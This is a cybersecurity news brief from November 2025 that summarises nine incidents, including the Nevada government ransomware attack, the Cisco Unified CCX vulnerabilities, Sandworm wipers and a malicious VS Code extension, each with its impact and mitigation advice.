Svoboda Cybersecurity Brief November 07, 2025

Nevada Government Systems Compromised for Months Before Ransomware Attack

A ransomware attack on Nevada’s government systems in August 2025 began as early as May when a state employee downloaded a trojanized system administration tool. Attackers harvested credentials from 26 accounts and deleted backups before deploying ransomware, costing $1.3M+ in recovery.
Impact: 60+ agencies disrupted, $1.5M recovery cost.
Mitigation: Centralized security operations, endpoint detection, and response (EDR).
Source: BleepingComputer

Cisco Unified CCX Critical Vulnerabilities Allow Remote Code Execution

Cisco patched two critical flaws (CVE-2025-20354 and CVE-2025-20358) in its Unified Contact Center Express (CCX) appliance, enabling unauthenticated attackers to execute arbitrary commands as root or bypass authentication via crafted files.
Impact: Full system compromise via RCE or privilege escalation.
Mitigation: Upgrade to fixed versions (12.5 SU3 ES07 or 15.0 ES01).
Source: BleepingComputer

Sandworm Deploys Data Wipers Against Ukrainian Grain Sector

Russian state-linked Sandworm (APT44) targeted Ukraine’s grain, government, and energy sectors with ZeroLot and Sting wipers in 2025, aiming to disrupt the economy. UAC-0099 provided initial access for follow-up attacks.
Impact: Critical infrastructure sabotage, economic disruption.
Mitigation: Offline backups, endpoint detection, and network segmentation.
Source: BleepingComputer

SonicWall Confirms State-Sponsored Hackers Stole Firewall Backups

A state-sponsored actor stole all firewall configuration backups from SonicWall’s cloud service in September 2025, exposing encrypted credentials. The breach was isolated to API access, unrelated to Akira ransomware attacks.
Impact: Credential exposure enabling targeted attacks.
Mitigation: Reset credentials via SonicWall’s tools, audit firewall configurations.
Source: The HackerNews

AI-Generated Ransomware Extension Sneaks into VS Code Marketplace

A malicious “susvsex” VS Code extension, likely AI-generated, exfiltrated and encrypted files using AES-256-CBC. Despite explicit warnings in its description, Microsoft initially failed to remove it.
Impact: Data theft and encryption for unsuspecting developers.
Mitigation: Manual review of extensions, restrict installation to verified publishers.
Source: BleepingComputer

ClickFix Malware Evolves with Multi-OS Support and Video Tutorials

ClickFix campaigns now include OS-aware video tutorials and countdown timers to pressure victims into running malicious commands. Attacks target Cloudflare CAPTCHA pages via malvertising and compromised WordPress sites.
Impact: Credential theft, malware deployment (e.g., info-stealers).
Mitigation: Block malvertising domains, educate users on command-line risks.
Source: BleepingComputer

Pro-Russian Hackers Target Belgian Telecoms with DDoS Attacks

NoName057 claimed responsibility for DDoS attacks against Proximus, Scarlet, and Ghent University Hospital, briefly disrupting services. Telenet denied being affected despite the group’s claims.
Impact: Service outages, no data compromise.
Mitigation: Deploy DDoS mitigation services, monitor traffic spikes.
Source: DataBreaches.net

Hyundai AutoEver America Discloses Data Breach

Hyundai’s IT arm confirmed a breach in March 2025, with hackers accessing Social Security and driver’s license numbers. The attack lasted from February 22 to March 2.
Impact: PII exposure for a limited number of employees.
Mitigation: Notify affected individuals, enhance endpoint monitoring.
Source: SecurityWeek

AISURU Botnet Domains Flood Cloudflare Rankings

The AISURU botnet (comprising IoT devices) abused Cloudflare’s DNS to boost malicious domains to top rankings. Cloudflare redacted the domains after public scrutiny.
Impact: DNS service abuse, potential trust erosion in rankings.
Mitigation: Block .su TLD, monitor DNS query anomalies.
Source: KrebsOnSecurity

Share this brief: https://svo.bz/QcfV